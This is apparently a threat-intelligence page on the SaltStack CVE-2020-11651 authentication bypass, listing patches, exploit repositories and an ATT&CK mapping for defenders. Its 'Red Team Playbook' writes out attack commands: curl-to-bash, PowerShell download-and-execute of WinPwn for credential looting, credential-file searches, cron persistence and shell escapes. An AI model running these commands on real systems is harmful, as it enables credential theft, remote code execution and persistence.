CVE-2020-11651

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 30/04 Upd 21/10

Overview

This vulnerability is an authentication bypass in the SaltStack salt-master ClearFuncs class, where method calls are not properly validated. The flaw resides in the salt-master process's handling of remote procedure calls, allowing unauthenticated access to internal methods. The affected component is the salt-master service in SaltStack versions prior to 2019.2.4 and 3000 before 3000.2.

Vulnerability Description

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

Impact

An attacker can remotely execute arbitrary commands on salt minions and retrieve sensitive authentication tokens from the salt-master without any authentication or user interaction. This leads to full compromise of the SaltStack infrastructure, enabling lateral movement and control over managed systems. The vulnerability facilitates unauthorized access to critical systems, potentially resulting in data breaches, operational disruption, and loss of system integrity.

Solution

Apply the vendor-provided patches as indicated in the respective security advisories: upgrade SaltStack Salt to version 2019.2.4 or later, or 3000.2 or later. Refer to the openSUSE security announcement (http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html), Debian DSA-4676 (https://www.debian.org/security/2020/dsa-4676), and Cisco Security Advisory (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG) for detailed patching instructions. Ubuntu users should consult USN-4459-1 (https://usn.ubuntu.com/4459-1/) for updates and mitigation guidance.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in SaltStack Salt arises from improper validation of method calls within the salt-master process, specifically in the ClearFuncs class. This flaw allows unauthorized remote users to invoke certain methods without the necessary authentication. The implications of this oversight are significant, as it enables attackers to access sensitive functionalities, including the retrieval of user tokens from the salt master. Furthermore, the vulnerability permits the execution of arbitrary commands on salt minions, which can lead to a complete compromise of the system's integrity and confidentiality.

Attack vectors exploiting this vulnerability are varied and can be executed with relative ease. An attacker with network access to the salt-master can craft requests that leverage the unvalidated method calls. By doing so, they can bypass authentication mechanisms and gain unauthorized access to critical operations. For instance, an attacker could retrieve user tokens, which may provide them with elevated privileges or access to other sensitive resources within the infrastructure. Additionally, the ability to run arbitrary commands on salt minions could allow an attacker to manipulate or exfiltrate data, deploy malware, or disrupt services, thereby amplifying the potential damage.

The real-world impact of this vulnerability is profound, particularly for organizations relying on SaltStack for configuration management and orchestration. The high CVSS score of 9.8 highlights the critical nature of the flaw, indicating that successful exploitation could lead to severe consequences. Businesses may face operational disruptions, data breaches, and reputational damage, all of which can result in significant financial losses. Furthermore, regulatory compliance issues may arise if sensitive data is exposed, leading to potential legal ramifications and fines. The interconnected nature of modern IT environments means that the repercussions of such a breach can extend beyond the immediate organization, affecting partners and customers alike.

To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating SaltStack to the latest versions is crucial, as patches addressing this vulnerability have been released. Implementing strict network segmentation can also limit exposure to the salt-master, reducing the attack surface. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activity or unauthorized access attempts. Conducting regular security audits and vulnerability assessments will further enhance an organization’s ability to identify and remediate potential weaknesses in their systems.

In conclusion, the vulnerability within SaltStack Salt represents a significant threat to organizations utilizing this platform for their operational needs. The ease of exploitation, coupled with the potential for severe consequences, underscores the importance of proactive security measures. By prioritizing timely updates, network security, and continuous monitoring, organizations can better safeguard their environments against the risks posed by this and similar vulnerabilities. The evolving threat landscape necessitates a vigilant and adaptive security posture to protect critical assets and maintain operational integrity.




CSURFACE threat intelligence has detected a marked escalation in the exploit landscape surrounding CVE-2020-11651, highlighted by the emergence of multiple publicly available proof-of-concept exploits and the introduction of a Metasploit module that significantly lowers the technical barrier for attackers. This development has been accompanied by the vulnerability’s formal inclusion in the CISA KEV catalog, underscoring its criticality and the urgency for defensive prioritization. The EPSS score’s substantial increase to a high-risk level reflects growing confidence in the exploitability of this vulnerability in real-world scenarios. These changes collectively indicate that threat actors now have easier access to reliable tools for remote code execution against SaltStack Salt environments, increasing the likelihood of widespread exploitation. Consequently, the threat level has escalated from theoretical to imminent, necessitating heightened vigilance as adversaries can more readily leverage this vulnerability for lateral movement, credential theft, or command execution on affected systems.



Update 2 — April 17, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-11651, with initial confirmed sightings emerging after a prolonged period of low activity. This development coincides with the sustained availability of multiple proof-of-concept exploits on public repositories, which continue to attract community engagement and facilitate adversary access to reliable attack tools. Although the EPSS score remains stable at a high level, the appearance of active exploitation signals a shift from theoretical risk to practical threat, underscoring the vulnerability’s exploitation viability in operational environments. For defenders, this escalation signifies an increased urgency to monitor SaltStack Salt deployments closely, as threat actors are now more likely to leverage this vulnerability for unauthorized command execution and credential theft. The threat level has consequently risen to a heightened state of alert, reflecting the growing confidence and capability of attackers to exploit this critical flaw in real-world scenarios.



Update 3 — June 23, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2020-11651, accompanied by the emergence of several new proof-of-concept tools that lower the barrier for adversaries to weaponize this vulnerability. Our telemetry indicates that attackers are increasingly leveraging these publicly available exploits to execute unauthorized commands and extract sensitive credentials from SaltStack Salt deployments. This trend is reflected in a rising EPSS score, signaling growing exploit likelihood and reinforcing the vulnerability’s operational relevance. The expanded exploit landscape and heightened detection frequency underscore a shift toward more frequent and sophisticated attacks, elevating the risk posture for organizations running vulnerable SaltStack Salt versions. Consequently, the threat level associated with CVE-2020-11651 has intensified, demanding heightened vigilance as threat actors demonstrate enhanced capability and intent to exploit this critical flaw in real-world environments.

Affected Products (10)

Vendor Product Version CPE
saltstack Saltstack Salt All cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
saltstack Saltstack Salt All cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*
opensuse Opensuse Leap 15.1 cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
debian Debian Debian Linux 8.0 cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
debian Debian Debian Linux 9.0 cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
debian Debian Debian Linux 10.0 cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
canonical Canonical Ubuntu Linux 16.04 cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*
canonical Canonical Ubuntu Linux 18.04 cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
vmware Vmware Application Remote Collector 7.5.0 cpe:2.3:a:vmware:application_remote_collector:7.5.0:*:*:*:*:*:*:*
vmware Vmware Application Remote Collector 8.0.0 cpe:2.3:a:vmware:application_remote_collector:8.0.0:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (2)

Module Authors Rank Platform Link
SaltStack Salt Master/Minion Unauthenticated RCE
exploits/linux/misc/saltstack_salt_unauth_rce
F-Secure, wvu Unknown - View
SaltStack Salt Master Server Root Key Disclosure
auxiliary/gather/saltstack_salt_root_key
F-Secure, wvu Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
Saltstack 3000.1 - Remote Code Execution Jasper Lievisse Adriaanse remote multiple - View

GitHub PoCs (14)

Repository Author Stars Forks Date Link
jasperla/CVE-2020-11651-poc
PoC exploit of CVE-2020-11651 and CVE-2020-11652
jasperla 122 42 2020-05-04 View
dozernz/cve-2020-11651
dozernz 106 36 2020-05-04 View
rossengeorgiev/salt-security-backports
Salt security backports for CVE-2020-11651 & CVE-2020-11652
rossengeorgiev 108 15 2020-05-01 View
0xc0d/CVE-2020-11651
CVE-2020-11651: Proof of Concept
0xc0d 40 14 2020-05-04 View
ssrsec/CVE-2020-11651-CVE-2020-11652-EXP
CVE-2020-11651&&CVE-2020-11652 EXP
ssrsec 24 15 2020-05-07 View
bravery9/SaltStack-Exp
CVE-2020-11651&&CVE-2020-11652 EXP
bravery9 5 8 2020-05-04 View
kevthehermit/CVE-2020-11651
PoC for CVE-2020-11651
kevthehermit 6 3 2020-05-04 View
chef-cft/salt-vulnerabilities
Checks for CVE-2020-11651 and CVE-2020-11652
chef-cft 6 1 2020-05-01 View
lovelyjuice/cve-2020-11651-exp-plus
lovelyjuice 5 2 2020-05-07 View
Drew-Alleman/CVE-2020-11651
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injec...
Drew-Alleman 1 0 2025-03-30 View
appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652
Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.
appcheck-ng 1 0 2020-11-30 View
s1lentf00thold/CVE-2020-11651-Poc
s1lentf00thold 0 0 2026-06-23 View
RakhithJK/CVE-2020-11651
PoC for CVE-2020-11651
RakhithJK 0 0 2020-05-09 View
hardsoftsecurity/CVE-2020-11651-PoC
Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python.
hardsoftsecurity 0 0 2023-12-18 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

8 events
2026-08-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2021-11-03
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2020-05-01
PoC Published (14 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2020-04-30
Exploit Published (1 ExploitDB, 2 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
92% auth_bypass
Remote Code Execution
45% rce
OS Command Injection
42% command_injection
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1053.003 Cron Kill Chain execution, persistence, privilege-escalation Linux, macOS, ESXi
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns

No CAPEC pattern mapped to this CVE.

Red Team Playbook

47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1053.003 Cron - Add script to /etc/cron.d folder Linux Shell Privileged
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Command (Shell)
echo "#{command}" > /etc/cron.d/#{cron_script_name}
T1053.003 Cron - Add script to /var/spool/cron/crontabs/ folder Linux Bash Privileged
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.003 Cron - Add script to all cron subfolders Linux, macOS Bash Privileged
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003 Cron - Replace crontab with referenced file Linux, macOS Shell
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Command (Shell)
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (13)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-11651
docs.saltstack.com
GitHub CVE x_refsource_MISC
https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
github.com
GitHub CVE x_refsource_MISC
https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
lists.opensuse.org
GitHub CVE vendor-advisory x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html
debian.org
GitHub CVE vendor-advisory x_refsource_DEBIAN
https://www.debian.org/security/2020/dsa-4676
vmware.com
GitHub CVE x_refsource_CONFIRM
http://www.vmware.com/security/advisories/VMSA-2020-0009.html
packetstormsecurity.com
GitHub CVE x_refsource_MISC
http://packetstormsecurity.com/files/157678/SaltStack-Salt-Master-Minion-Unauthenticated-Remote-Code-Execution.html
tools.cisco.com
GitHub CVE vendor-advisory x_refsource_CISCO
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG
lists.debian.org
GitHub CVE mailing-list x_refsource_MLIST
https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html
lists.opensuse.org
GitHub CVE vendor-advisory x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00070.html
usn.ubuntu.com
GitHub CVE vendor-advisory x_refsource_UBUNTU
https://usn.ubuntu.com/4459-1/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-11651